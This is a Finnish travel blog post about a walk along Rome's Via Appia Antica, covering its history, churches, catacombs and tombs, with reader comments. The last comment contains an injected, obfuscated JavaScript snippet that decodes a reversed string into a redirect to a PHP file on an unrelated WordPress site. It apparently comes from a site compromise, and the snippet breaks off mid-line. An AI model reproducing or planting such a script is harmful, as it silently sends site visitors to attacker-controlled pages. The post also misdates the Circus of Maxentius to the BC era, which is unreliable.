Image Alt

Blog

Aamupäivä Appia Anticalla – City-vaellus yli 2000 vuotta vanhalla tiellä

Onko se varma vanhuuden merkki, kun tuntee säänvaihtelut erinäisinä kolotuksina kropassaan? Pääsiäistä edeltävällä lomaviikolla saimme nauttia Roomassa hellelukemista, jotka romahtivat arjen alettua. Samaan aikaan iski myös itkuhuudon partaalle ajanut, sietämättömiin mittoihin äitynyt selkäsärky. Kesti viikon ennen kuin tajusin, että näillä asioilla voi olla yhteyttä. Selkäsärky johtuu tietenkin lämpötilan äkillisestä laskusta, lämmityksen lopettamisesta ja siitä, että nukun ikkunan vieressä, joka vetää ihan hemmetisti – huonolla lihaskunnolla ei liene osuutta asiaan. Joka tapauksessa nyt aamuisin koiranpissityslenkillä kaipaa toppatakkia ja jo esiin kaivamani kesämekot täytyy työntää kaapin perälle odottamaan kesän paluuta.

Mukavampaahan se tietysti on näin päin, että sää kääntyi kylmäksi vasta loman jälkeen. Kaikkihan me tiedämme sen tunteen, kun aurinko ilmestyy esiin sinä viimeisenä lomapäivänä. Nyt sää oli niin hieno, että näin jälkeenpäin loma tuntui melkein oikealta lomalta, vaikka päädyimmekin – jälleen kerran – viettämään sen kotona Roomassa (emmekä esimerkiksi Vietnamissa, jossa puoliso oli työmatkalla).  Kävimme jopa rannalla ja nuorempi teini kavereineen meressä uimassakin, mikä tällä hetkellä tuntuu ihan hyytävältä ajatus. Itse ajattelin vielä kuukauden tai pari odottaa, vaikka sää olisi lämpimänä pysynytkin.

Pieni jääkarhu rannalla

Pikkukoira oli samaa mieltä: ei veteen!

Sen verran kuuma rantaretkellä kuitenkin tuli, että päätin, että auto ja etenkin sen ilmastointi on viimein vietävä keväthuoltoon. Päätin ottaa tämänkin arkisen homman loman kannalta. Käyttämämme huoltamo nimittäin sijaitsee Appia Anticalla, joka on aivan mahtava paikka pienelle tai pitkälle vaellukselle ihan Rooman tuntumassa.

Appia Antica ennen ja nyt

Oletteko koskaan kuulleet, että “kaikki tiet vievät Roomaan”?  Via Appia on syy tähän tunnettuun sanontaan sanontaan. Sen rakennuttamisen aloitti kensori Appius Cladius Caecus ja siitä tuli Rooman julkisista teistä ensimmäinen, joka nimettiin rakennuttajansa mukaan. Via Appia johti roomalaisen elämän keskipisteestä Forum Romanumista Neapoliksen (nyk. Napoli) kautta satamakaupunkiin Brundisiumiin (nyk. Brindisi) saakka. Via Appian ensimmäinen Capuaan asti kulkenut osuus valmistui vuonna 312 eaa. Siis 2329 vuotta sitten (laskin iän valmiiksi puolestanne).

Via Appia map.jpg

Appia Antican kartta (c) WikiCommons

Kuten suurimman osan Rooman valtateistä, senkin rakennuttamisen perimmäinen tarkoitus oli taata Rooman armeijoille mahdollisuus nopeaan siirtymiseen vasta valloitetuilla alueilla (muita varhaisia teitä olivat Via Salaria “suolatie” ja Via Aurelia). Rooman legioonalaisten lisäksi Via Appiaa käyttivät niin kauppiaat kuin cursus publicuksenkin, Rooman eräänlaisen postilaitoksen lähetit.

Via Appia oli siis yli 600 kilometriä pitkä ja siitä on jäljellä pätkiä muuallakin kuin Roomassa. Tässä kirjoituksessa tarkoitan Via Appia Anticalla kuitenkin nimenomaan sitä osuutta, joka lähtee Porta San Sebastianilta lähellä Caracallan kylpylää. En tiedä, paljonko alkuperäisestä Via Appiasta on todellisuudessa jäljellä, mutta ainakin siellä on pätkiä, joidena kivistä voi erottaa kärrynpyörien jäljet. Joka tapauksessa on ihan huikeaa ajatella kulkevansa ainakin periaatteessa samalla tiellä, jolla legioonalaiset  marssivat yli 2000 vuotta sitten! Jota pitkin tuotiin elefantteja ja muita villieläimiä antiikin roomalaisten huvitukseksi Pohjois-Afrikasta. Jota pitkin pyhä Pietari pakeni Neron vainoamana Roomasta!

Nykyään Via Appia Antica tai Appia Antican puisto on suosittu ulkoilupaikka etenkin sunnuntaisin, kun se suljetaan liikenteeltä. Ja kun sanon suosittu, tarkoitan, että ei siellä nyt suorastaan jonossa joudu kävelemään, mutta väistelemään pyöräilijöitä ja isoja piknik-seurueita kuitenkin. Sen sijaan arkena ei juurikaan ollut muita kulkijoita. Appia Antican alkupätkä Porta San Sebastianilta San Sebastianin katakombeille käveleminen on epämiellyttävää – jopa vaarallista – vilkkaan liikenteen ja jalkakäytävien puuttumisen vuoksi, joten kannattaa tulla bussilla 118 joko San Calliston katakombien portille tai San Sebastianin katakombien luo asti. Liikenne nimittäin ohjautuu muualle San Sebastianin katakombien jälkeen ja sen jälkeen sypressien ja köynnösten reunustamalla antiikinaikaisella kadulla saa nauttia ihan rauhassa linnunlaulusta, hienoista maisemista ja keväisin vaikka upeista sinisateen (wisteria) peittämistä muureista. Ja halutessaan myös koko joukosta historiallisia nähtävyyksiä.

Via Appia Antica

Wisteriahysteria

Wisteria

2017-04-27_03-25-33

Nähtävyydet Appia Antican varrella

Appia Antica on tietenkin jo itsessään nähtävyys, jolla on tuhansia tarinoita kerrottavanaan. Mutta Roomassa kun ollaan, tietenkin sen varrella on myös paljon muuta nähtävää. Suuri osa hakeutuu Appia Anticalle tietenkin katakombien vuoksi, mutta niiden lisäksi Appialla on muitakin hautoja ja mausoleumeja, kauniita kirkkoja ja veistoksia, jopa yksi antiikinaikuinen sirkusareenakin.  Aamupäivän kävelyni aika ohitin seuraavat nähtävyydet – sisään niihin en pienen karvaisen seuralaiseni vuoksi päässyt.

Domine, quo vadis

Tämä kirkko on rakennettu paikalle, jolla legendan mukaan Jeesus ilmestyi Pietarille, kun tämä pakeni keisari Neron vainoa Roomasta. Tarina on kerrottu yhdessä Uuden testamentin apogryfikirjoista, Pietarin teoissa ja sen mukaan Pietari esitti Jeesukselle Via Appialla sittemmin latinankieliseksi lentäväksi lauseeksi muodostuneen kysymyksen “Quo vadis, Domine?” (suom. Minne menet, Herrani?) Jeesus vastasi:“Romam vado iterum crucifigi.” ( Roomaan uudelleen ristiinnaulittavaksi). Tämän kuultuaan Pietari häpesi pakoaan, palasi Roomaan ja kärsi siellä marttyyrikuoleman, vieläpä vaati tulla ristiinnaulituksi pää alaspäin, koska ei ollut Jeesuksen arvoinen. Kirkossa on tietenkin nähtävänä Jeesuksen jalanjäljet todistuksena tapahtumainkulusta.
Jeesuksen jalanjäljet

Pyhän Tarcissiuksen patsas

Pyhän Tarcissiuksen patsasQuo vadis-kirkolta kannattaa jatkaa kohti San Calliston katakombeja Via Appia Antican ja Via Ardeatinan kulmassa sijaitsevasta portista. Oliivilehtojen ja peltojen (joilla usein näkee lampaita) reunustama tie on paljon vilkasta Appia Antican osuutta miellyttävämpi kulkea.

Ennen katakombeja voi ihailla puiden yli yltävää, vaikuttavaa Pyhän Tarcissiuksen patsasta. Tarcissius oli 300-luvulla elänyt pikkupoika, joka tapettiin Via Appialla, kun hän oli viemässä ehtoollista muutamille vangituille kristityille. Hän antoi mieluummin hakata itsensä hengiltä kuin luovutti pyhän sakramentin tiellä kohtaamalleen roskaväelle.

 

 

Pääsiäisen tapahtumat puureliefein

San Caliston katakombeilta alkoi myös toinen, uudempi nähtävyys: tien varrella oli 12 kylttiä, joissa oli reliefejä. Reliefit kertoivat pääsiäisen ajan tapahtumat ristiinnaulitsemisesta Jeesuksen seuraavaan tulemiseen. Ihan hyvää muistinvirkistystä. Mitä siellä Emmauksen tiellä oikein tapahtuikaan?

2017-05-02_02-21-46Pääsiäisen tarina puureliefein

Basilica di San Sebastiano fuori le mura

Basilica di San Sebastiano fuori le mura

Vaikka ei San Sebastianin katakombeihin haluaisikaan pysähtyä, niin kannattaa pistäytyä kauniissa Basilica di San Sebastiano fuori le murassa (Pyhän Sebastianin kirkko muurien ulkopuolella). Kirkko kuului vuoden 2000 riemuvuoteen asti pyhiinvaeltajien ohjelmaan, jota yhä monet noudattavat. Kirkossa on myös Berninin viimeiseksi jäänyt veistos Salvator Mundi.

Maxentiuksen sirkus

2017-04-27_03-37-40Kun katakombeilta jatkaa matkaa pitkin hiljaiseksi muuttuvaa Appia Anticaa, vastaan tulee Maxentiuksen sirkuksen  rauniot vuodelta 306 eaa. Rooman toista ja tunnetumpaa sirkuskenttää, Maximuksen sirkusta, paremmin säilyneillä raunioilla voi perehtyä vaikka antiikin Rooman rakennustekniikkaan. Tai sitten vain kävellä ja ihailla raunioita, jotka ovat pysyneet pystyssä yli 2300 vuotta. Keisari Maxentius rakennutti sirkuksen, todennäköisesti aikomuksenaan järjestää siellä pelejä ja juhlia. Historiantutkimus kuitenkin viittaa siihen, että siellä pidettiin vain avajaisia ja todennäköisesti hautajaisseremonioita. Paikalta löytyy ainakin keisari Maxentiuksen pojan, vuonna 309 eaa. kuolleen Valerius Romuluksen hauta. Sirkuksen raunioille on vapaa (ilmainen) pääsy.

Cecilia Metellan mauseleumi

2017-04-27_03-37-33

2017-04-27_03-27-00

Yksi Via Appian upeimmista ja parhaiten säilyneistä nähtävyyksistä on Cecilia Metellan hauta. Tämä linnamainen on rakennettu aatelisnaisen hautapaikaksi ensimmäisellä vuosisadalla ennen ajanlaskun alkua. Cecilia Metallan miehen (tai apen) uskotaan olleen Marcus Licinius Crassus, joka palveli Julius Caesaria ja jota pidetään Rooman historian rikkaimpana miehenä. Rooman valtakunnan aikana vaikutusvaltainen perhe luultavasti rakennuttikin monumentaalisen haudan pikemminkin osoittamaan perheen vaurautta ja voimaa kuin itse Cecilia Metellan kunniaksi.

Cecilia Metellan mausoleumi on auki 9 – 16.30 päivittäin, suljettu maanantaisin. Lippu maksaa 6 € (3 € 18 – 25-vuotiaille EU:n kansalaisille ja opettajille, alle 18-vuotiaat ilmaiseksi. Samalla lipulla voi käydä viikon (7 vrk) sisällä myös Caracalla kylpylässä ja Quintilin villassa.

Lisävinkkejä Appia Antican city-vaellukselle

Alkoiko Appia Antica kiinnostaa? Minun ainakin tekisi mieli kulkea sitä vielä pidemmälle kuin tähän asti tai lähteä liikkeelle uudesta paikasta, reittivinkkejä saa ainakin Appia Antican puiston kotisivuilta. Nyt nimittäin kävi niin, että aina seuraavan suoran päässä näkyi jotain niin nättiä, että sinne tuli käveltyä muistamatta, että jos kävelee 2 tuntia yhteen suuntaan, niin paluumatka kestää suunnilleen saman verran…No onneksi ilman pysähdyksiä vähän vähemmän. Pyörällä tietysti pääsee pidemmälle ja Appia Antican varrella onkin useita pyörävuokraamoita. Myös valmiita retkiä järjestetään.

Tuisku Appia Anticalla

Paras vaelluskaveri (paitsi jos haluaa käydä sisällä kirkoissa ja muissa nähtävyyksissä)

2017-05-02_03-56-10

Mukaan kannattaa varata hyvät kengät ja vesipullo. Vesipulloa voi täyttää vesihanoista, nasoneista, joita on muutamia matkan varrella. Tien varrella on muutamia ravintoloita ja kahviloita, jotka ainakin näyttivät tosi kivoilta. Kyllä olisi kylmä olut tai valkoviinilasillinen maistunut, mutta kun oli se auto ajettavana! Älkää kuitenkaan ostako juomianne, jäätelöänne tai voileipäänne katakombien edustalla olevasta kärrystä, ellette halua tukea järjestäytynyttä rikollisuutta, sillä ne ovat kaikki mafian hallinnassa.

Bonusvinkki (tätä et oppaista löydä!)

Jos palaatte Via Appia Anticaa San Sebastianin katakombeilta Roomaan päin – tai päinvastoin – muistakaa vilkuttaa bussipysäkin lähettyvillä olevan talon ikkunassa päivystävälle mummolle. Vaaleanpunaiseen aamutakkiin pukeutunut mummo on ainakin minulle huiskuttanut kättä jokikinen kerta, kun olen talon ohi kulkenut. Ei voi mitään, vanhan talon ikkunassa näkyvässä mummelissa on minusta jotain vähän karmivaa. En ole uskaltanut ottaa kuvaakaan, kun pelkään, ettei mummoa pian näykään kuvassa 😀

Pahoittelen muuten tämän jutun kuvien laatua. Kameran akku lopahti jo alkumetreillä; ammattibloggaajaksi on vielä matkaa siis. Ajattelin aluksi vain kävellä ja nauttia. Kesti ehkä 2 minuuttia ennen kuin kaivoin kännykän esiin.

 

 

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

15 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Karin
Karin
6 years ago

Oi oi! Nyt iski kaipuu sinne:)
Pitää ehdottomasti tuolla tehdä pieni vaellus!
Kiitos hienosta blogista. Kivasti kirjoitettu ja paljon infoa

Johanna @ Out of Office
Johanna @ Out of Office
6 years ago

Kiva artikkeli! Olen halunnut tuonne, mutta on siipan mielestä liian kaukana keskustasta. Voisin lähteä vain sinisateen vuoksi! Ovat upeita kukkiessaan

Sateenmuru
6 years ago

Oi oi, entiselle latinistille Via Appia (ihan mikä pätkä tahansa!) olisi unelma! Hienoa, mielenkiintoinen kirjoitus. Pitää käydä kurkkimassa sinun muitakin tekstejä vinkkejä. P.S. Minäkin tajusin pari vuotta sitten, että ilmaston lämpötilanvaihtelut saavat hartiat kolottamaan…

Kohteena maailma / Rami

Tämä olisi hyvä lisä seuraavan Rooman reissun ohjelmaan. Olisi hyvä lisä Rooman historiaan tutustumiseen ja hieman vaihtelua keskustan alueisiin. Matka-aikahan tuolle retkelle on varsin sopiva, loppuajan voisi käyttää gastronomiaan 🙂

Heidi/Himomatkaajan Turinoita

Kiitos kattavasta tietopaketistasi! Sitä lukiessa oli mukava virkistää muistia.
Noilla samoilla kivillä on tullut käveltyä, tosin ilman koirulia. Myös katakombeissa tuli pyörähdettyä, oli varsin mielenkiintoinen kokemus.

Johanna Hulda / Vida de Estrada

Onpa kiinnostava tie ja hirmuisesti nähtävää sen varrella! Pituuskaan ei kävelylenkiltä lopu ainakaan kesken, heh. Ehdottomasti suuntaan tänne, jos ja kun tie vie Roomaan. Olen kävellyt tuollaista vanhaa roomalaisten rakentamaa tietä Portugalissa Santiagon vaelluksella, mutta sen varrella oli lähinnä metsiä ja satunnaisia taloja 🙂

Merja / Merjan matkassa

Bonusvinkki hieman karmiva 🙂 Kivannäköinen reitti ja hyvä huomio, että kaksi tuntia yhteen suuntaan kestää takaisinpäin saman verran. Sen meinaa unohtaa ja kotimatka tuntuu sitten pitkältä.

S<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitaco
S